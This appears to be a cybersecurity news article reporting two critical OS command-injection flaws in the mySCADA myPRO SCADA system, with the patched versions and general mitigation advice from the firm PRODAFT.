Cybersecurity researchers have identified two high-severity vulnerabilities in mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system widely used in operational technology (OT) environments. These flaws could allow threat actors to gain unauthorized control over affected systems.
"These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially leading to severe operational disruptions and financial losses," said Swiss security firm PRODAFT.
Both security flaws are rated 9.3 on the CVSS v4 scale and stem from operating system command injection issues:
- CVE-2025-20014 – Allows attackers to execute arbitrary commands via crafted POST requests with a version parameter.
- CVE-2025-20061 – Enables remote command execution using a POST request with an email parameter.
If exploited, these vulnerabilities could enable command injection and arbitrary code execution on affected systems.
Security Updates & Mitigation Measures
The issues have been addressed in the following patched versions:
- mySCADA PRO Manager 1.3
- mySCADA PRO Runtime 9.2.1
PRODAFT attributes the flaws to improper input validation, which creates an entry point for command injection attacks.
"These vulnerabilities highlight the persistent security risks in SCADA systems and the need for stronger defenses," the company stated. "Exploitation could lead to operational disruptions, financial losses, and safety hazards."
Organizations using mySCADA myPRO should take immediate action by:
- Applying the latest patches to eliminate vulnerabilities.
- Isolating SCADA systems from IT networks through network segmentation.
- Enforcing strong authentication measures to prevent unauthorized access.
- Monitoring system activity for signs of suspicious behavior.
By implementing these cybersecurity best practices, organizations can fortify their SCADA environments against potential attacks.